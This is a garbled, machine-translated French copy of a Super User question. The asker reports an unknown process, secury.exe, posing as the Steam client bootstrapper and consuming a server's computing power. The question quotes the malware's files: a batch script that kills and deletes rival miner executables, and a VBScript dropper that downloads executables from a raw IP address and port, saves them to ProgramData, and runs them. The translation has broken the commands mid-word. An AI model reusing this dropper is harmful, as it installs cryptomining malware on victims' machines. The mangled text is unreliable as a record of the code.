http://wm-monitoring.ru/ ')) {alert('Спасибо за то что установили нашу кнопку! =)');} else {alert('Очень жаль! =(');}"> http://wm-monitoring.ru/

windows - Comment arrêter définitivement l'amorçage du client Steam - Super User

J'ai la situation suivante dans mon gestionnaire de tâches:

Je ne sais pas de quel type d’application il s’agit, mais ce n’est certainement pas le programme d’amorçage du client Steam car je ne l’ai pas installé et je ne peux pas non plus le désinstaller.

Si j'essaie de comprendre le type d'application via cette étape:

Je vois quelque chose comme ça:

Dans l'utilitaire MS Config, je n'ai rien trouvé qui ressemble à secury.exe.

Lorsque j'ouvre l'emplacement du fichier, je vois trois fichiers:

m.bat, b.exe, 4.vbs.

Ci-dessous, le contenu de m.bat:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe tâchekill / f / t / im MSASCui.exe tâchekill / f / t / im SystemSettlngs.exe tâchekill / f / t / im SystemSetting.exe tâchekill / f / t / im Process.exe tâchekill / f / t / im winlnlt.exe tâchekill / f / t / im tâche WindowsUpgrade.exe / f / t / im msdc.exe tâchekill / f / t / im Fiddlere.exe tâchekill / f / t / im shovst.exe taskkill / f / t / im lkrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe tâchekill / f / t / im svchosts.exe tâchekill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe tâchekill / f / t / im fcty.exe tâchekill / f / t / im soiuos.exe tâchekill / f / t / im TrustedInstaller.exe de C: \ Windows \ System32 \ soiuos.exe de C: \ Windows \ Setup \ TrustedInstaller.exe du C: \ ProgramData \ kingsoft.exe du C: \ ProgramData \ expl0rer.exe du C: \ ProgramData \ ieplare.exe du C: \ ProgramData \ nssm.exe du C: \ ProgramData \ MSASCui.exe du C: \ Pro gramData \ SystemSettlngs.exe du C: \ ProgramData \ SystemSetting.exe du C: \ ProgramData \ Process.exe du C: \ ProgramData \ winlnlt.exe du C: \ ProgramData \ WindowsUpgrade.exe du C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe de C: \ ProgramData \ shovst.exe de C: \ ProgramData \ lqrtqe.exe de C: \ ProgramData \ apkls.exe de C: \ ProgramData \ winlog.exe de C: \ ProgramData \ svchosts.exe de C: \ ProgramData \ win1ogins.exe de C: \ ProgramData \ shovsts.exe de C: \ ProgramData \ fcty.exe de C: \ ProgramData \ pool.exe de C: \ ProgramData \ pool2.exe de C: \ ProgramData \ pool3.exe

Suivant va 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Définissez xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Définir sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Exécutez "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Exécutez "del C: \ ProgramData \ pool3.exe"

Que puis-je faire pour empêcher secury.exe d’abuser de la puissance de calcul de mon serveur?

Post-scriptum J'ai exécuté Avast vérification complète de mon ordinateur, mais rien trouvé de mal.

Карта